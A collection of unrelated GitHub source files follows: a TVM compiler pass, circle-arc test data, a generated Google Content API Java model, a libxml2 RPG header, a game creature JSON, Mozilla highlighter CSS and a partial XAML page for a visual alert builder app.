// Rewrites nn.bias_add(data, bias) into expand_dims(bias) + broadcast add,
// so later passes only have to reason about basic operators.
class BiasAddSimplifier : public ExprRewriter {
 public:
  BiasAddSimplifier() : bias_add_op_(Op::Get("nn.bias_add")) {}

  Expr Rewrite_(const CallNode* n, const Expr& post) override {
    auto new_n = post;
    if (n->op == bias_add_op_) {
      Call call = Downcast<Call>(new_n);
      CHECK_EQ(call->args.size(), 2);
      const BiasAddAttrs* param = call->attrs.as<BiasAddAttrs>();

      auto ttype = n->args[0]->type_as<TensorTypeNode>();
      size_t n_dim = ttype->shape.size();
      // Normalize a negative axis to its positive equivalent.
      int axis = param->axis;
      if (axis < 0) {
        axis += n_dim;
      }
      // Reshape the 1-D bias so it broadcasts along `axis` of the data,
      // then replace the call with a plain Add; keep the original type.
      Expr expanded_bias = ExpandBiasToMatchAxis(call->args[1], n_dim, {axis});
      Expr ret = Add(call->args[0], expanded_bias);
      ret->checked_type_ = n->checked_type_;
      return ret;
    }
    // Not a bias_add call: leave the (already post-order rewritten) node alone.
    return new_n;
  }

 private:
  // Cache the bias_add op for equivalence checking.
  const Op& bias_add_op_;
};

// Applies BiasAddSimplifier over the whole expression in post order.
Expr CanonicalizeOps(const Expr& e) {
  auto rewriter = BiasAddSimplifier();
  return PostOrderRewrite(e, &rewriter);
}

namespace transform {

// Pass wrapper: opt level 3, requires type inference to have run
// (the rewrite reads checked types off the call arguments).
Pass CanonicalizeOps() {
  runtime::TypedPackedFunc<Function(Function, IRModule, PassContext)> pass_func =
      [=](Function f, IRModule m, PassContext pc) {
        return Downcast<Function>(CanonicalizeOps(f));
      };
  return CreateFunctionPass(pass_func, 3, "CanonicalizeOps", {"InferType"});
}

TVM_REGISTER_GLOBAL("relay._transform.CanonicalizeOps").set_body_typed(CanonicalizeOps);

}  // namespace transform
} // namespace relay
} // namespace tvm
| {
"pile_set_name": "Github"
} |
# x^2+y^2=1
c 0 0 1 1 EXT[1,0,0] EXT[0,0,0] EXT[0,0,0] EXT[1,0,0]
c 0 0 1 1 EXT[0,0,0] EXT[1,0,0] EXT[-1,0,0] EXT[0,0,0]
c 0 0 1 1 EXT[-1,0,0] EXT[0,0,0] EXT[0,0,0] EXT[-1,0,0]
c 0 0 1 1 EXT[0,0,0] EXT[-1,0,0] EXT[1,0,0] EXT[0,0,0]
# (x-1/2)^2+y^2=1/4
c 1/2 0 1/4 1 EXT[1,0,0] EXT[0,0,0] EXT[1/2,0,0] EXT[1/2,0,0]
c 1/2 0 1/4 1 EXT[1/2,0,0] EXT[1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c 1/2 0 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[1/2,0,0] EXT[-1/2,0,0]
c 1/2 0 1/4 1 EXT[1/2,0,0] EXT[-1/2,0,0] EXT[1,0,0] EXT[0,0,0]
# (x+1/2)^2+y^2=1/4
c -1/2 0 1/4 1 EXT[-1,0,0] EXT[0,0,0] EXT[-1/2,0,0] EXT[-1/2,0,0]
c -1/2 0 1/4 1 EXT[-1/2,0,0] EXT[-1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c -1/2 0 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[-1/2,0,0] EXT[1/2,0,0]
c -1/2 0 1/4 1 EXT[-1/2,0,0] EXT[1/2,0,0] EXT[-1,0,0] EXT[0,0,0]
# (y-1/2)^2+x^2=1/4
c 0 1/2 1/4 1 EXT[0,0,0] EXT[1,0,0] EXT[-1/2,0,0] EXT[1/2,0,0]
c 0 1/2 1/4 1 EXT[-1/2,0,0] EXT[1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c 0 1/2 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[1/2,0,0] EXT[1/2,0,0]
c 0 1/2 1/4 1 EXT[1/2,0,0] EXT[1/2,0,0] EXT[0,0,0] EXT[1,0,0]
# (y+1/2)^2+x^2=1/4
c 0 -1/2 1/4 1 EXT[0,0,0] EXT[-1,0,0] EXT[1/2,0,0] EXT[-1/2,0,0]
c 0 -1/2 1/4 1 EXT[1/2,0,0] EXT[-1/2,0,0] EXT[0,0,0] EXT[0,0,0]
c 0 -1/2 1/4 1 EXT[0,0,0] EXT[0,0,0] EXT[-1/2,0,0] EXT[-1/2,0,0]
c 0 -1/2 1/4 1 EXT[-1/2,0,0] EXT[-1/2,0,0] EXT[0,0,0] EXT[-1,0,0]
# x^2+y^2=1
a 0 0 1 1
# (x-1/2)^2+y^2=1/4
a 1/2 0 1/4 1
# (x+1/2)^2+y^2=1/4
a -1/2 0 1/4 1
# (y-1/2)^2+x^2=1/4
a 0 1/2 1/4 1
# (y+1/2)^2+x^2=1/4
a 0 -1/2 1/4 1
| {
"pile_set_name": "Github"
} |
/*
* Licensed under the Apache License, Version 2.0 (the "License"); you may not use this file except
* in compliance with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software distributed under the License
* is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express
* or implied. See the License for the specific language governing permissions and limitations under
* the License.
*/
/*
* This code was generated by https://github.com/googleapis/google-api-java-client-services/
* Modify at your own risk.
*/
package com.google.api.services.content.model;
/**
 * The required fields vary based on the frequency of fetching. For a monthly fetch schedule,
 * day_of_month and hour are required. For a weekly fetch schedule, weekday and hour are required.
 * For a daily fetch schedule, only hour is required.
 *
 * <p> This is the Java data model class that specifies how to parse/serialize into the JSON that is
 * transmitted over HTTP when working with the Content API for Shopping. For a detailed explanation
 * see:
 * <a href="https://developers.google.com/api-client-library/java/google-http-java-client/json">https://developers.google.com/api-client-library/java/google-http-java-client/json</a>
 * </p>
 *
 * <p> Generated model class: each field is bound to its JSON property by the
 * {@code @com.google.api.client.util.Key} annotation; prefer regenerating over hand-editing. </p>
 *
 * @author Google, Inc.
 */
@SuppressWarnings("javadoc")
public final class DatafeedFetchSchedule extends com.google.api.client.json.GenericJson {
  /**
   * The day of the month the feed file should be fetched (1-31).
   * Required for a monthly fetch schedule; unused for weekly/daily schedules.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.Long dayOfMonth;
  /**
   * The URL where the feed file can be fetched. Google Merchant Center will support automatic
   * scheduled uploads using the HTTP, HTTPS, FTP, or SFTP protocols, so the value will need to be a
   * valid link using one of those four protocols.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.String fetchUrl;
  /**
   * The hour of the day the feed file should be fetched (0-23).
   * Required for all schedule frequencies (monthly, weekly, and daily).
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.Long hour;
  /**
   * The minute of the hour the feed file should be fetched (0-59). Read-only.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.Long minuteOfHour;
  /**
   * An optional password for fetch_url.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.String password;
  /**
   * Whether the scheduled fetch is paused or not.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.Boolean paused;
  /**
   * Time zone used for schedule. UTC by default. E.g., "America/Los_Angeles".
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.String timeZone;
  /**
   * An optional user name for fetch_url.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.String username;
  /**
   * The day of the week the feed file should be fetched.
   * Required for a weekly fetch schedule; unused for monthly/daily schedules.
   * The value may be {@code null}.
   */
  @com.google.api.client.util.Key
  private java.lang.String weekday;
  /**
   * The day of the month the feed file should be fetched (1-31).
   * @return value or {@code null} for none
   */
  public java.lang.Long getDayOfMonth() {
    return dayOfMonth;
  }
  /**
   * The day of the month the feed file should be fetched (1-31).
   * @param dayOfMonth dayOfMonth or {@code null} for none
   */
  public DatafeedFetchSchedule setDayOfMonth(java.lang.Long dayOfMonth) {
    this.dayOfMonth = dayOfMonth;
    return this;
  }
  /**
   * The URL where the feed file can be fetched. Google Merchant Center will support automatic
   * scheduled uploads using the HTTP, HTTPS, FTP, or SFTP protocols, so the value will need to be a
   * valid link using one of those four protocols.
   * @return value or {@code null} for none
   */
  public java.lang.String getFetchUrl() {
    return fetchUrl;
  }
  /**
   * The URL where the feed file can be fetched. Google Merchant Center will support automatic
   * scheduled uploads using the HTTP, HTTPS, FTP, or SFTP protocols, so the value will need to be a
   * valid link using one of those four protocols.
   * @param fetchUrl fetchUrl or {@code null} for none
   */
  public DatafeedFetchSchedule setFetchUrl(java.lang.String fetchUrl) {
    this.fetchUrl = fetchUrl;
    return this;
  }
  /**
   * The hour of the day the feed file should be fetched (0-23).
   * @return value or {@code null} for none
   */
  public java.lang.Long getHour() {
    return hour;
  }
  /**
   * The hour of the day the feed file should be fetched (0-23).
   * @param hour hour or {@code null} for none
   */
  public DatafeedFetchSchedule setHour(java.lang.Long hour) {
    this.hour = hour;
    return this;
  }
  /**
   * The minute of the hour the feed file should be fetched (0-59). Read-only.
   * @return value or {@code null} for none
   */
  public java.lang.Long getMinuteOfHour() {
    return minuteOfHour;
  }
  /**
   * The minute of the hour the feed file should be fetched (0-59). Read-only.
   * @param minuteOfHour minuteOfHour or {@code null} for none
   */
  public DatafeedFetchSchedule setMinuteOfHour(java.lang.Long minuteOfHour) {
    this.minuteOfHour = minuteOfHour;
    return this;
  }
  /**
   * An optional password for fetch_url.
   * @return value or {@code null} for none
   */
  public java.lang.String getPassword() {
    return password;
  }
  /**
   * An optional password for fetch_url.
   * @param password password or {@code null} for none
   */
  public DatafeedFetchSchedule setPassword(java.lang.String password) {
    this.password = password;
    return this;
  }
  /**
   * Whether the scheduled fetch is paused or not.
   * @return value or {@code null} for none
   */
  public java.lang.Boolean getPaused() {
    return paused;
  }
  /**
   * Whether the scheduled fetch is paused or not.
   * @param paused paused or {@code null} for none
   */
  public DatafeedFetchSchedule setPaused(java.lang.Boolean paused) {
    this.paused = paused;
    return this;
  }
  /**
   * Time zone used for schedule. UTC by default. E.g., "America/Los_Angeles".
   * @return value or {@code null} for none
   */
  public java.lang.String getTimeZone() {
    return timeZone;
  }
  /**
   * Time zone used for schedule. UTC by default. E.g., "America/Los_Angeles".
   * @param timeZone timeZone or {@code null} for none
   */
  public DatafeedFetchSchedule setTimeZone(java.lang.String timeZone) {
    this.timeZone = timeZone;
    return this;
  }
  /**
   * An optional user name for fetch_url.
   * @return value or {@code null} for none
   */
  public java.lang.String getUsername() {
    return username;
  }
  /**
   * An optional user name for fetch_url.
   * @param username username or {@code null} for none
   */
  public DatafeedFetchSchedule setUsername(java.lang.String username) {
    this.username = username;
    return this;
  }
  /**
   * The day of the week the feed file should be fetched.
   * @return value or {@code null} for none
   */
  public java.lang.String getWeekday() {
    return weekday;
  }
  /**
   * The day of the week the feed file should be fetched.
   * @param weekday weekday or {@code null} for none
   */
  public DatafeedFetchSchedule setWeekday(java.lang.String weekday) {
    this.weekday = weekday;
    return this;
  }
  /** Sets a field by its JSON name; overridden only to narrow the return type for chaining. */
  @Override
  public DatafeedFetchSchedule set(String fieldName, Object value) {
    return (DatafeedFetchSchedule) super.set(fieldName, value);
  }
  /** Returns a deep copy of this schedule; overridden only to narrow the return type. */
  @Override
  public DatafeedFetchSchedule clone() {
    return (DatafeedFetchSchedule) super.clone();
  }
}
| {
"pile_set_name": "Github"
} |
* Summary: interface for an HTML 4.0 non-verifying parser
* Description: this module implements an HTML 4.0 non-verifying parser
* with API compatible with the XML parser ones. It should
* be able to parse "real world" HTML, even if severely
* broken from a specification point of view.
*
* Copy: See Copyright for the status of this software.
*
* Author: Patrick Monnerat <[email protected]>, DATASPHERE S.A.
/if not defined(HTML_PARSER_H__)
/define HTML_PARSER_H__
/include "libxmlrpg/xmlversion"
/include "libxmlrpg/parser"
/if defined(LIBXML_HTML_ENABLED)
* Most of the back-end structures from XML and HTML are shared.
d htmlParserCtxtPtr...
d s based(######typedef######)
d like(xmlParserCtxtPtr)
d htmlParserCtxt ds based(htmlParserCtxtPtr)
d likeds(xmlParserCtxt)
d htmlParserNodeInfoPtr...
d s based(######typedef######)
d like(xmlParserNodeInfoPtr)
d htmlParserNodeInfo...
d ds based(htmlParserNodeInfoPtr)
d likeds(xmlParserNodeInfo)
d htmlSAXHandlerPtr...
d s based(######typedef######)
d like(xmlSAXHandlerPtr)
d htmlSAXHandler ds based(htmlSAXHandlerPtr)
d likeds(xmlSAXHandler)
d htmlParserInputPtr...
d s based(######typedef######)
d like(xmlParserInputPtr)
d htmlParserInput...
d ds based(htmlParserInputPtr)
d likeds(xmlParserInput)
d htmlDocPtr s based(######typedef######)
d like(xmlDocPtr)
d htmlNodePtr s based(######typedef######)
d like(xmlNodePtr)
* Internal description of an HTML element, representing HTML 4.01
* and XHTML 1.0 (which share the same structure).
d htmlElemDescPtr...
d s * based(######typedef######)
d htmlElemDesc ds based(htmlElemDescPtr)
d align qualified
d name * const char *
d startTag 3u 0 Start tag implied ?
d endTag 3u 0 End tag implied ?
d saveEndTag 3u 0 Save end tag ?
d empty 3u 0 Empty element ?
d depr 3u 0 Deprecated element ?
d dtd 3u 0 Loose DTD/Frameset
d isinline 3u 0 Block 0/inline elem?
d desc * const char *
*
* New fields encapsulating HTML structure
*
* Bugs:
* This is a very limited representation. It fails to tell us when
* an element *requires* subelements (we only have whether they're
* allowed or not), and it doesn't tell us where CDATA and PCDATA
* are allowed. Some element relationships are not fully represented:
* these are flagged with the word MODIFIER
*
d subelts * const char * *
d defaultsubelt * const char *
d attrs_opt * const char * *
d attrs_depr * const char * *
d attrs_req * const char * *
* Internal description of an HTML entity.
d htmlEntityDescPtr...
d s * based(######typedef######)
d htmlEntityDesc...
d ds based(htmlEntityDescPtr)
d align qualified
d value 10u 0 Unicode char value
d name * const char *
d desc * const char *
* There is only few public functions.
d htmlTagLookup pr extproc('htmlTagLookup')
d like(htmlElemDescPtr) const
d tag * value options(*string) const xmlChar *
d htmlEntityLookup...
d pr extproc('htmlEntityLookup')
d like(htmlEntityDescPtr) const
d name * value options(*string) const xmlChar *
d htmlEntityValueLookup...
d pr extproc('htmlEntityValueLookup')
d like(htmlEntityDescPtr) const
d value 10u 0 value
d htmlIsAutoClosed...
d pr 10i 0 extproc('htmlIsAutoClosed')
d doc value like(htmlDocPtr)
d elem value like(htmlNodePtr)
d htmlAutoCloseTag...
d pr 10i 0 extproc('htmlAutoCloseTag')
d doc value like(htmlDocPtr)
d name * value options(*string) const xmlChar *
d elem value like(htmlNodePtr)
d htmlParseEntityRef...
d pr extproc('htmlParseEntityRef')
d like(htmlEntityDescPtr) const
d ctxt value like(htmlParserCtxtPtr)
d str * const xmlChar *(*)
d htmlParseCharRef...
d pr 10i 0 extproc('htmlParseCharRef')
d ctxt value like(htmlParserCtxtPtr)
d htmlParseElement...
d pr extproc('htmlParseElement')
d ctxt value like(htmlParserCtxtPtr)
d htmlNewParserCtxt...
d pr extproc('htmlNewParserCtxt')
d like(htmlParserCtxtPtr)
d htmlCreateMemoryParserCtxt...
d pr extproc('htmlCreateMemoryParserCtxt')
d like(htmlParserCtxtPtr)
d buffer * value options(*string) const char *
d size 10i 0 value
d htmlParseDocument...
d pr 10i 0 extproc('htmlParseDocument')
d ctxt value like(htmlParserCtxtPtr)
d htmlSAXParseDoc...
d pr extproc('htmlSAXParseDoc')
d like(htmlDocPtr)
d cur * value options(*string) xmlChar *
d encoding * value options(*string) const char *
d sax value like(htmlSAXHandlerPtr)
d userData * value void *
d htmlParseDoc pr extproc('htmlParseDoc')
d like(htmlDocPtr)
d cur * value options(*string) xmlChar *
d encoding * value options(*string) const char *
d htmlSAXParseFile...
d pr extproc('htmlSAXParseFile')
d like(htmlDocPtr)
d filename * value options(*string) const char *
d encoding * value options(*string) const char *
d sax value like(htmlSAXHandlerPtr)
d userData * value void *
d htmlParseFile pr extproc('htmlParseFile')
d like(htmlDocPtr)
d filename * value options(*string) const char *
d encoding * value options(*string) const char *
d UTF8ToHtml pr 10i 0 extproc('UTF8ToHtml')
d out 65535 options(*varsize) unsigned char []
d outlen 10i 0
d in * value options(*string) const unsigned char*
d inlen 10i 0
d htmlEncodeEntities...
d pr 10i 0 extproc('htmlEncodeEntities')
d out 65535 options(*varsize) unsigned char []
d outlen 10i 0
d in * value options(*string) const unsigned char*
d inlen 10i 0
d quoteChar 10i 0 value
d htmlIsScriptAttribute...
d pr 10i 0 extproc('htmlIsScriptAttribute')
d name * value options(*string) const xmlChar *
d htmlHandleOmittedElem...
d pr 10i 0 extproc('htmlHandleOmittedElem')
d val 10i 0 value
/if defined(LIBXML_PUSH_ENABLED)
* Interfaces for the Push mode.
d htmlCreatePushParserCtxt...
d pr extproc('htmlCreatePushParserCtxt')
d like(htmlParserCtxtPtr)
d sax value like(htmlSAXHandlerPtr)
d user_data * value void *
d chunk * value options(*string) const char *
d size 10i 0 value
d filename * value options(*string) const char *
d enc value like(xmlCharEncoding)
d htmlParseChunk pr 10i 0 extproc('htmlParseChunk')
d ctxt value like(htmlParserCtxtPtr)
d chunk * value options(*string) const char *
d size 10i 0 value
d terminate 10i 0 value
/endif LIBXML_PUSH_ENABLED
d htmlFreeParserCtxt...
d pr extproc('htmlFreeParserCtxt')
d ctxt value like(htmlParserCtxtPtr)
* New set of simpler/more flexible APIs
* xmlParserOption:
*
* This is the set of XML parser options that can be passed down
* to the xmlReadDoc() and similar calls.
d htmlParserOption...
d s 10i 0 based(######typedef######) enum
d HTML_PARSE_RECOVER... Relaxed parsing
d c X'00000001'
d HTML_PARSE_NODEFDTD... No default doctype
d c X'00000004'
d HTML_PARSE_NOERROR... No error reports
d c X'00000020'
d HTML_PARSE_NOWARNING... No warning reports
d c X'00000040'
d HTML_PARSE_PEDANTIC... Pedantic err reports
d c X'00000080'
d HTML_PARSE_NOBLANKS... Remove blank nodes
d c X'00000100'
d HTML_PARSE_NONET... Forbid net access
d c X'00000800'
d HTML_PARSE_NOIMPLIED... No implied html/body
d c X'00002000'
d HTML_PARSE_COMPACT... compact small txtnod
d c X'00010000'
d HTML_PARSE_IGNORE_ENC... Ignore encoding hint
d c X'00200000'
d htmlCtxtReset pr extproc('htmlCtxtReset')
d ctxt value like(htmlParserCtxtPtr)
d htmlCtxtUseOptions...
d pr 10i 0 extproc('htmlCtxtUseOptions')
d ctxt value like(htmlParserCtxtPtr)
d options 10i 0 value
d htmlReadDoc pr extproc('htmlReadDoc')
d like(htmlDocPtr)
d cur * value options(*string) const xmlChar *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadFile pr extproc('htmlReadFile')
d like(htmlDocPtr)
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadMemory pr extproc('htmlReadMemory')
d like(htmlDocPtr)
d buffer * value options(*string) const char *
d size 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadFd pr extproc('htmlReadFd')
d like(htmlDocPtr)
d fd 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlReadIO pr extproc('htmlReadIO')
d like(htmlDocPtr)
d ioread value like(xmlInputReadCallback)
d ioclose value like(xmlInputCloseCallback)
d ioctx * value void *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadDoc...
d pr extproc('htmlCtxtReadDoc')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d cur * value options(*string) const xmlChar *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadFile...
d pr extproc('htmlCtxtReadFile')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d filename * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadMemory...
d pr extproc('htmlCtxtReadMemory')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d buffer * value options(*string) const char *
d size 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadFd pr extproc('htmlCtxtReadFd')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d fd 10i 0 value
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
d htmlCtxtReadIO pr extproc('htmlCtxtReadIO')
d like(htmlDocPtr)
d ctxt value like(xmlParserCtxtPtr)
d ioread value like(xmlInputReadCallback)
d ioclose value like(xmlInputCloseCallback)
d ioctx * value void *
d URL * value options(*string) const char *
d encoding * value options(*string) const char *
d options 10i 0 value
* Further knowledge of HTML structure
d htmlStatus s 10i 0 based(######typedef######) enum
d HTML_NA c X'0000' No check at all
d HTML_INVALID c X'0001'
d HTML_DEPRECATED...
d c X'0002'
d HTML_VALID c X'0004'
d HTML_REQUIRED c X'000C' HTML_VALID ored-in
* Using htmlElemDesc rather than name here, to emphasise the fact
* that otherwise there's a lookup overhead
d htmlAttrAllowed...
d pr extproc('htmlAttrAllowed')
d like(htmlStatus)
d #param1 value like(htmlElemDescPtr) const
d #param2 * value options(*string) const xmlChar *
d #param3 10i 0 value
d htmlElementAllowedHere...
d pr 10i 0 extproc('htmlElementAllowedHere')
d #param1 value like(htmlElemDescPtr) const
d #param2 * value options(*string) const xmlChar *
d htmlElementStatusHere...
d pr extproc('htmlElementStatusHere')
d like(htmlStatus)
d #param1 value like(htmlElemDescPtr) const
d #param2 value like(htmlElemDescPtr) const
d htmlNodeStatus pr extproc('htmlNodeStatus')
d like(htmlStatus)
d #param1 value like(htmlNodePtr)
d #param2 10i 0 value
* C macros implemented as procedures for ILE/RPG support.
d htmlDefaultSubelement...
d pr * extproc('__htmlDefaultSubelement') const char *
d elt * value const htmlElemDesc *
d htmlElementAllowedHereDesc...
d pr 10i 0 extproc(
d '__htmlElementAllowedHereDesc')
d parent * value const htmlElemDesc *
d elt * value const htmlElemDesc *
d htmlRequiredAttrs...
d pr * extproc('__htmlRequiredAttrs') const char * *
d elt * value const htmlElemDesc *
/endif LIBXML_HTML_ENABLED
/endif HTML_PARSER_H__
| {
"pile_set_name": "Github"
} |
{
"slug": "viviteel",
"category": "galvanised",
"ai": "RandomAI",
"moveset": [
{
"level_learned": 2,
"technique": "rust_bomb"
},
{
"level_learned": 2,
"technique": "constrict"
},
{
"level_learned": 2,
"technique": "perfect_cut"
}
],
"shape": "Serpent",
"types": [
"Metal"
],
"weight": 25
}
| {
"pile_set_name": "Github"
} |
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
/* Overlay root: never intercepts mouse events, so the page under the
   highlighter stays interactive by default. */
.highlighter-container {
  pointer-events: none;
}
/* Toolbar/controls pinned to the top-left corner of the overlay. */
.highlighter-controls {
  position: absolute;
  top: 0;
  left: 0;
}
/* Clips the outline so it cannot spill outside the highlighted area. */
.highlighter-outline-container {
  overflow: hidden;
  position: relative;
}
.highlighter-outline {
  position: absolute;
}
/* Hidden outline: fully transparent and click-through, but kept in the
   box tree (display: -moz-box) so the opacity transition below can run. */
.highlighter-outline[hidden] {
  opacity: 0;
  pointer-events: none;
  display: -moz-box;
}
/* Animate show/hide and position/size changes unless transitions are
   explicitly disabled via the disable-transitions attribute. */
.highlighter-outline:not([disable-transitions]) {
  transition-property: opacity, top, left, width, height;
  transition-duration: 0.1s;
  transition-timing-function: linear;
}
/*
 * Node Infobar
 */
.highlighter-nodeinfobar-container {
  position: absolute;
  max-width: 95%;
}
/* Same hidden-state trick as the outline: invisible but transitionable. */
.highlighter-nodeinfobar-container[hidden] {
  opacity: 0;
  pointer-events: none;
  display: -moz-box;
}
/* Transitions apply when enabled, or when force-transitions overrides a
   disable-transitions attribute. */
.highlighter-nodeinfobar-container:not([disable-transitions]),
.highlighter-nodeinfobar-container[disable-transitions][force-transitions] {
  transition-property: transform, opacity, top, left;
  transition-duration: 0.1s;
  transition-timing-function: linear;
}
/* Single-line node description; long text is truncated with an ellipsis.
   Forced LTR so markup-like text renders consistently. */
.highlighter-nodeinfobar-text {
  overflow: hidden;
  white-space: nowrap;
  text-overflow: ellipsis;
  direction: ltr;
}
/* Icon-only toolbar buttons: suppress their text labels. */
.highlighter-nodeinfobar-button > .toolbarbutton-text {
  display: none;
}
/* Buttons only appear while the infobar is locked or hovered. */
.highlighter-nodeinfobar-container:not([locked]):not(:hover) > .highlighter-nodeinfobar > .highlighter-nodeinfobar-button {
  visibility: hidden;
}
/* Re-enable mouse interaction (overridden from the click-through root)
   when the infobar is locked or hovered. */
.highlighter-nodeinfobar-container[locked] > .highlighter-nodeinfobar,
.highlighter-nodeinfobar-container:not([locked]):hover > .highlighter-nodeinfobar {
  pointer-events: auto;
}
/* Make the id/class/pseudo-class/tagname fragments selectable text. */
html|*.highlighter-nodeinfobar-id,
html|*.highlighter-nodeinfobar-classes,
html|*.highlighter-nodeinfobar-pseudo-classes,
html|*.highlighter-nodeinfobar-tagname {
  -moz-user-select: text;
  -moz-user-focus: normal;
  cursor: text;
}
/* Pointer arrow: hidden by default, shown on the side facing the node
   depending on whether the infobar sits above or below it. */
.highlighter-nodeinfobar-arrow {
  display: none;
}
.highlighter-nodeinfobar-container[position="top"]:not([hide-arrow]) > .highlighter-nodeinfobar-arrow-bottom {
  display: block;
}
.highlighter-nodeinfobar-container[position="bottom"]:not([hide-arrow]) > .highlighter-nodeinfobar-arrow-top {
  display: block;
}
.highlighter-nodeinfobar-container[disabled] {
  visibility: hidden;
}
/* Tag names are displayed lowercase regardless of source casing. */
html|*.highlighter-nodeinfobar-tagname {
  text-transform: lowercase;
}
"pile_set_name": "Github"
} |
<Page
x:Class="IntelligentKioskSample.Views.VisualAlert.VisualAlertBuilderPage"
xmlns="http://schemas.microsoft.com/winfx/2006/xaml/presentation"
xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml"
xmlns:local="using:IntelligentKioskSample.Views.VisualAlert"
xmlns:ctl="using:IntelligentKioskSample.Controls"
xmlns:d="http://schemas.microsoft.com/expression/blend/2008"
xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"
mc:Ignorable="d"
SizeChanged="OnPageSizeChanged"
x:Name="mainPage"
Background="{ThemeResource ApplicationPageBackgroundThemeBrush}">
<Page.Resources>
<SolidColorBrush x:Key="GrayColor" Color="White" Opacity="0.6" />
<ctl:ReverseVisibilityConverter x:Key="reverseVisibilityConverter"/>
</Page.Resources>
<Grid EntranceNavigationTransitionInfo.IsTargetElement="True">
<Grid.RowDefinitions>
<RowDefinition Height="auto" />
<RowDefinition />
</Grid.RowDefinitions>
<CommandBar x:Name="commandBar" Style="{StaticResource PageTitleCommandBarStyle}">
<CommandBar.Content>
<TextBlock Text="Visual Alert Builder" Style="{ThemeResource PageTitleTextBlockStyle}"/>
</CommandBar.Content>
</CommandBar>
<Grid Grid.Row="1" ColumnSpacing="12" Margin="24,30,0,0">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="0.3*" MinWidth="220"/>
<ColumnDefinition Width="*"/>
</Grid.ColumnDefinitions>
<!-- Left panel: models -->
<Grid Grid.Column="0" VerticalAlignment="Stretch">
<!-- New alert wizard steps -->
<Grid x:Name="newAlertGrid">
<Grid.RowDefinitions>
<RowDefinition Height="Auto"/>
<RowDefinition/>
</Grid.RowDefinitions>
<StackPanel Spacing="14">
<TextBlock Text="New Alert" Style="{StaticResource SubtitleTextBlockStyle}"/>
<ctl:LifecycleControl x:Name="lifecycleControl" StepCollection="{Binding LifecycleStepCollection}"/>
</StackPanel>
<Button Grid.Row="1" VerticalAlignment="Bottom" Background="Transparent" Margin="0,0,0,40" Click="OnCancelNewAlert">
<StackPanel Orientation="Horizontal" Spacing="8">
<SymbolIcon Symbol="Cancel"/>
<TextBlock Text="Cancel new alert"/>
</StackPanel>
</Button>
</Grid>
<!-- Alert list -->
<StackPanel x:Name="scenarioListPanel" Spacing="6">
<Grid>
<Grid.ColumnDefinitions>
<ColumnDefinition />
<ColumnDefinition Width="Auto"/>
</Grid.ColumnDefinitions>
<TextBlock Text="Alerts" Style="{StaticResource SubtitleTextBlockStyle}"/>
<StackPanel Orientation="Horizontal" HorizontalAlignment="Right" Spacing="6">
<Button x:Name="deleteButton" Background="Transparent" HorizontalAlignment="Right" Click="OnDeleteScenariosButtonClicked" Visibility="Collapsed">
<FontIcon FontFamily="Segoe MDL2 Assets" Glyph=""/>
</Button>
<Button Background="Transparent" HorizontalAlignment="Right" Click="OnEditScenarioListButtonClicked">
<FontIcon FontFamily="Segoe MDL2 Assets" Glyph=""/>
</Button>
</StackPanel>
</Grid>
<ListView x:Name="scenarioListView" SelectionMode="Single" Margin="12,22,0,0"
ItemsSource="{Binding ScenarioCollection}" SelectionChanged="OnScenarioListViewSelectionChanged">
<ListView.ItemTemplate>
<DataTemplate>
<TextBlock Text="{Binding Name}"/>
</DataTemplate>
</ListView.ItemTemplate>
</ListView>
<Grid x:Name="newAlertStatusGrid" Visibility="Collapsed" RowSpacing="6">
<Grid.RowDefinitions>
<RowDefinition />
<RowDefinition />
</Grid.RowDefinitions>
<StackPanel Orientation="Horizontal" Spacing="6" Margin="24,6,0,0">
<TextBlock x:Name="alertNameTextBlock" Foreground="{StaticResource GrayColor}" />
<TextBlock x:Name="alertStatusTextBlock" Foreground="{StaticResource GrayColor}" />
</StackPanel>
<ProgressBar Grid.Row="1" x:Name="newAlertProgressBar" Background="#0078D7" HorizontalAlignment="Stretch" ShowPaused="False" ShowError="False"/>
</Grid>
<Button x:Name="newAlertButton" Foreground="#0078D7" Background="Transparent" Margin="12,20,0,0" Click="OnNewAlertButtonClicked">
<StackPanel Orientation="Horizontal" Spacing="12">
